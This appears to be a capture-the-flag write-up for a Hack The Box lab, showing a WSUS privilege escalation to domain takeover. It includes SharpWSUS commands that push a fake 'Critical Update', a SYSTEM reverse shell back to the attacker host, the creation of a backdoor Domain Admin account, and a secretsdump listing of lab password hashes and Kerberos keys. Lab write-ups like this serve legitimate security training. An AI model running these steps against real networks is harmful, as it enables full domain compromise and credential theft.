Windows Server Update Services (WSUS)
presence of windows server update services (WSUS) was initially suspected due to the dedicated shares exposed on the SMB server and additional evidences were further suggested within the client.outdated.htb host, by PEAS and BloodHound. It was later confirmed that WSUSservice indeed is running on the DC host; dc.outdated.htb
According to the official Microsoft documentation,
windows server update services (WSUS) enables information technology administrators to deploy the latest Microsoft product updates. You can use WSUS to fully manage the distribution of updates that are released through Microsoft Update to computers on your network. This article provides an overview of this server role and more information about how to deploy and maintain WSUS.
Thus, the WSUS administrators group is indeed a privileged group that can be abused for privilege escalation
sharpwsus
While there are many tools available online, the tool above appears to be most well constructed
Pre-compiled binary isn’t available
Prep
Compiling
*evil-winrm* ps c:\Users\sflowers\Documents> upload WSUS/SharpWSUS/SharpWSUS/bin/Release/SharpWSUS.exe .
info: Uploading /home/kali/archive/htb/labs/outdated/WSUS/SharpWSUS/SharpWSUS/bin/Release/SharpWSUS.exe to C:\Users\sflowers\Documents\.
data: 65536 bytes of 65536 bytes copied
info: Upload successful!
*evil-winrm* ps c:\Users\sflowers\Documents> upload WSUS/pe.exe .
info: Uploading /home/kali/archive/htb/labs/outdated/WSUS/pe.exe to C:\Users\sflowers\Documents\.
data: 9556 bytes of 9556 bytes copied
info: Upload successful!Uploading the compiled exploit as well as the payload
It’s important to note that the invoking payload must be a Window’s signed binary
*evil-winrm* ps c:\Users\sflowers\Documents> tree /F /A C:\Users\sflowers
Folder PATH listing
Volume serial number is 2170-25D8
c:\USERS\SFLOWERS
+---Desktop
| PsExec64.exe
| user.txt
|
+---Documents
| SharpWSUS.exe
| winPEASx64.exe
|
+---Downloads
+---Favorites
+---Links
+---Music
+---Pictures
+---Saved Games
\---VideosConveniently, there is a SysInternal’s PsExec64.exe available at the home directory of the sflowers user
I will leverage that
Explotiation
*Evil-WinRM* PS C:\Users\sflowers\Documents> .\SharpWSUS.exe locate
____ _ __ ______ _ _ ____
/ ___|| |__ __ _ _ __ _ _\ \ / / ___|| | | / ___|
\___ \| '_ \ / _` | '__| '_ \ \ /\ / /\___ \| | | \___ \
___) | | | | (_| | | | |_) \ V V / ___) | |_| |___) |
|____/|_| |_|\__,_|_| | .__/ \_/\_/ |____/ \___/|____/
|_|
Phil Keeble @ Nettitude Red Team
[*] Action: Locate WSUS Server
WSUS Server: http://wsus.outdated.htb:8530
[*] Locate completeWSUS server is located at http://wsus.outdated.htb:8530
wsus.outdated.htbis another alias fordc.outdated.htb- The web server on the port
8530that was seen in the beginning was the WSUS server
*Evil-WinRM* PS C:\Users\sflowers\Documents> .\SharpWSUS.exe inspect
____ _ __ ______ _ _ ____
/ ___|| |__ __ _ _ __ _ _\ \ / / ___|| | | / ___|
\___ \| '_ \ / _` | '__| '_ \ \ /\ / /\___ \| | | \___ \
___) | | | | (_| | | | |_) \ V V / ___) | |_| |___) |
|____/|_| |_|\__,_|_| | .__/ \_/\_/ |____/ \___/|____/
|_|
Phil Keeble @ Nettitude Red Team
[*] Action: Inspect WSUS Server
################# WSUS Server Enumeration via SQL ##################
ServerName, WSUSPortNumber, WSUSContentLocation
-----------------------------------------------
DC, 8530, c:\WSUS\WsusContent
####################### Computer Enumeration #######################
ComputerName, IPAddress, OSVersion, LastCheckInTime
---------------------------------------------------
dc.outdated.htb, 172.16.20.1, 10.0.17763.1432, 1/6/2024 5:25:16 AM
####################### Downstream Server Enumeration #######################
ComputerName, OSVersion, LastCheckInTime
---------------------------------------------------
####################### Group Enumeration #######################
GroupName
---------------------------------------------------
All Computers
Downstream Servers
Unassigned Computers
[*] Inspect completeInspect command provides an overview over the target’s WSUSservice
Server is the DC host, so is the sole client
*Evil-WinRM* PS C:\Users\sflowers\Documents> .\SharpWSUS.exe create /payload:"C:\Users\sflowers\Desktop\PsExec64.exe" /args:" -accepteula -s C:\Users\sflowers\Documents\pe.exe" /title:"Critical Update"
____ _ __ ______ _ _ ____
/ ___|| |__ __ _ _ __ _ _\ \ / / ___|| | | / ___|
\___ \| '_ \ / _` | '__| '_ \ \ /\ / /\___ \| | | \___ \
___) | | | | (_| | | | |_) \ V V / ___) | |_| |___) |
|____/|_| |_|\__,_|_| | .__/ \_/\_/ |____/ \___/|____/
|_|
Phil Keeble @ Nettitude Red Team
[*] Action: Create Update
[*] Creating patch to use the following:
[*] Payload: PsExec64.exe
[*] Payload Path: C:\Users\sflowers\Desktop\PsExec64.exe
[*] Arguments: -accepteula -s C:\Users\sflowers\Documents\pe.exe
[*] Arguments (HTML Encoded): -accepteula -s C:\Users\sflowers\Documents\pe.exe
################# WSUS Server Enumeration via SQL ##################
ServerName, WSUSPortNumber, WSUSContentLocation
-----------------------------------------------
DC, 8530, c:\WSUS\WsusContent
ImportUpdate
Update Revision ID: 38
PrepareXMLtoClient
InjectURL2Download
DeploymentRevision
PrepareBundle
PrepareBundle Revision ID: 39
PrepareXMLBundletoClient
DeploymentRevision
[*] Update created - When ready to deploy use the following command:
[*] SharpWSUS.exe approve /updateid:80e97571-ac3c-4782-9c09-da1bf1543f5e /computername:Target.FQDN /groupname:"Group Name"
[*] To check on the update status use the following command:
[*] SharpWSUS.exe check /updateid:80e97571-ac3c-4782-9c09-da1bf1543f5e /computername:Target.FQDN
[*] To delete the update use the following command:
[*] SharpWSUS.exe delete /updateid:80e97571-ac3c-4782-9c09-da1bf1543f5e /computername:Target.FQDN /groupname:"Group Name"
[*] Create completeCreating a “critical update” that will invoke the existing PsExec64.exe to call the payload Now, this must be approved by an “WSUS Administrator”
*Evil-WinRM* PS C:\Users\sflowers\Documents> .\SharpWSUS.exe approve /updateid:80e97571-ac3c-4782-9c09-da1bf1543f5e /computername:dc.outdated.htb
____ _ __ ______ _ _ ____
/ ___|| |__ __ _ _ __ _ _\ \ / / ___|| | | / ___|
\___ \| '_ \ / _` | '__| '_ \ \ /\ / /\___ \| | | \___ \
___) | | | | (_| | | | |_) \ V V / ___) | |_| |___) |
|____/|_| |_|\__,_|_| | .__/ \_/\_/ |____/ \___/|____/
|_|
Phil Keeble @ Nettitude Red Team
[*] Action: Approve Update
Targeting dc.outdated.htb
TargetComputer, ComputerID, TargetID
------------------------------------
dc.outdated.htb, bd6d57d0-5e6f-4e74-a789-35c8955299e1, 1
Group Exists = False
Group Created: InjectGroup
Added Computer To Group
Approved Update
[*] Approve completeApproved
┌──(kali㉿kali)-[~/…/htb/labs/outdated/WSUS]
└─$ nnc 1234
listening on [any] 1234 ...
connect to [10.10.14.23] from (UNKNOWN) [10.10.11.175] 49635
Microsoft Windows [Version 10.0.17763.1432]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32> whoami
whoami
nt authority\system
C:\Windows\system32> hostname
hostname
DC
C:\Windows\system32> ipconfig
ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0 3:
Connection-specific DNS Suffix . : htb
IPv6 Address. . . . . . . . . . . : dead:beef::1ef
IPv6 Address. . . . . . . . . . . : dead:beef::554e:a6a1:8f40:d164
Link-local IPv6 Address . . . . . : fe80::554e:a6a1:8f40:d164%15
IPv4 Address. . . . . . . . . . . : 10.10.11.175
Subnet Mask . . . . . . . . . . . : 255.255.254.0
Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:6c92%15
10.10.10.2
Ethernet adapter vEthernet (vSwitch):
Connection-specific DNS Suffix . :
IPv4 Address. . . . . . . . . . . : 172.16.20.1
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 0.0.0.0System Level Compromise
Hashdump
c:\Windows\system32> net user adm1n Qwer1234 /ADD /DOMAIN
net user adm1n Qwer1234 /ADD /DOMAIN
The command completed successfully.
c:\Windows\system32> net group "Domain Admins" /ADD adm1n /DOMAIN
net group "Domain Admins" /ADD adm1n /DOMAIN
The command completed successfully.Creating an arbitrary DA account
┌──(kali㉿kali)-[~/…/htb/labs/outdated/WSUS]
└─$ impacket-secretsdump outdated.htb/adm1n:Qwer1234@dc.outdated.htb -k -dc-ip $IP
Impacket v0.11.0 - Copyright 2023 Fortra
[-] CCache file is not found. Skipping...
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] target system bootkey: 0xc461277899780d4dcc67e71dd6779759
[*] dumping local sam hashes (uid:rid:lmhash:nthash)
administrator:500:aad3b435b51404eeaad3b435b51404ee:8aa878df2fd7dfbe60da36207785c9dc:::
guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
defaultaccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
outdated\dc$:plain_password_hex:af195f658ad3dc984cad49fa8f3db352c226299119dd1393a2927cc8b8ed2ee24f71c6e9fa70be3e1670b99c471527316516b85a487d2d3dd9685b974f50093680e619af99bc802022b9a458bae1c333db526f73e54803e76a253fa3113c3f84e9c7ea7b65656cb458aea83d38da141838b2868a3b29736b1f982c6d6eba8b076dcdc63c963ec80884cf9769f071e7b0f7e0c1319e6af2e56ee8e5ee17119d090d36e2683262282a55f0ddba76c374bd078444d3d1ef3e16dcda6454979a0843e2c9366a35137ecad971dfc89276078cb5e99850f9ffd8649acd2fc45c3b08af30130ffe37b113e8dd4aa5ab64825e47
outdated\dc$:aad3b435b51404eeaad3b435b51404ee:bb723f16c602237297e5c91d7968cf35:::
[*] DPAPI_SYSTEM
dpapi_machinekey:0xca4e3313b093134dce1688a3152150328a682735
dpapi_userkey:0x32e6a5cae3002840c8d498d65f45e927094da5ca
[*] NL$KM
0000 63 2D F2 B8 52 BA BA 7F 0F 17 EF A8 E0 C2 F2 34 c-..R..........4
0010 8B 38 B9 9C B4 67 FC 41 AE 8B 32 73 91 E6 B1 BC .8...g.A..2s....
0020 5f 76 e0 3a aa 3f de 73 c5 b8 84 0f 66 3b cb ef _v.:.?.s....f;..
0030 7D 0C 02 B1 1F B9 B1 60 03 0C 2F 18 28 C4 D9 91 }......`../.(...
nl$km:632df2b852baba7f0f17efa8e0c2f2348b38b99cb467fc41ae8b327391e6b1bc5f76e03aaa3fde73c5b8840f663bcbef7d0c02b11fb9b160030c2f1828c4d991
[*] dumping domain credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
[-] CCache file is not found. Skipping...
administrator:500:aad3b435b51404eeaad3b435b51404ee:716f1ce2e2cf38ee1210cce35eb78cb6:::
guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:a300e4031093085c7af7ac61a79e6d00:::
outdated.htb\btables:1106:aad3b435b51404eeaad3b435b51404ee:781444163f086fdf8de13de9110ed6e7:::
outdated.htb\sflowers:1108:aad3b435b51404eeaad3b435b51404ee:1fcdb1f6015dcb318cc77bb2bda14db5:::
adm1n:20603:aad3b435b51404eeaad3b435b51404ee:91ff0fb948167eb4d080b5330686c02f:::
dc$:1002:aad3b435b51404eeaad3b435b51404ee:bb723f16c602237297e5c91d7968cf35:::
client$:1105:aad3b435b51404eeaad3b435b51404ee:d805ad109346699956d56bf7ff7aad7a:::
[*] Kerberos keys grabbed
administrator:aes256-cts-hmac-sha1-96:63aee8b6212f896e9f77ffe35c5e627eb6d7747789ce3bbbe0a7795e4fa5d30f
administrator:aes128-cts-hmac-sha1-96:9bc253debb8c72719bb4d9556da893c8
administrator:des-cbc-md5:c73d37ce7aa23bba
krbtgt:aes256-cts-hmac-sha1-96:fc0777c879de9a1b5829a0f5af4ad4ceecc0467ed5b4ed4da03cc8c166c2f6a4
krbtgt:aes128-cts-hmac-sha1-96:4bcb0dc7aa6d2350c2f393a9363c0d90
krbtgt:des-cbc-md5:0de5104361fbbafd
outdated.htb\btables:aes256-cts-hmac-sha1-96:4768842d807c4c86c0a790c6f3e5d9d95da0756bcba3b673d9d706c4e9d6a1ef
outdated.htb\btables:aes128-cts-hmac-sha1-96:fe8bfe29a913b75fda3334866bcb184b
outdated.htb\btables:des-cbc-md5:6b3dae3e25ea1597
outdated.htb\sflowers:aes256-cts-hmac-sha1-96:d09b6258f76a317292085ea334ce76f72a36398d7c19a343c9bc180ed3ee20d8
outdated.htb\sflowers:aes128-cts-hmac-sha1-96:2cc8eab0b52accdf43d4aaba13f5c61d
outdated.htb\sflowers:des-cbc-md5:cd9e10bf648c49fd
adm1n:aes256-cts-hmac-sha1-96:2a621eaa8c6081fbd9bb2994469b30132e047f5edaef06c113493f2815947913
adm1n:aes128-cts-hmac-sha1-96:d89b4ae6d19e5d38bcd920999f0d893c
adm1n:des-cbc-md5:5ef7408c2fba6b4a
dc$:aes256-cts-hmac-sha1-96:8f1a5be1d5fbc99901e7d727fb051cbc9d9e9076bc42526be7cfd9483ab56b6e
dc$:aes128-cts-hmac-sha1-96:f0d3747993ce20bb0de9c52205989fe2
dc$:des-cbc-md5:921c94587c895d8a
client$:aes256-cts-hmac-sha1-96:fce129b4fd3c01c4fb52467c4688a22d0e8e67dfcd9f92270d41068a299b8975
client$:aes128-cts-hmac-sha1-96:cd447982cddb51568b00193645fce372
client$:des-cbc-md5:ef1f859e9167ad3e
[*] Cleaning up...
[*] Stopping service RemoteRegistryDomain Level Compromise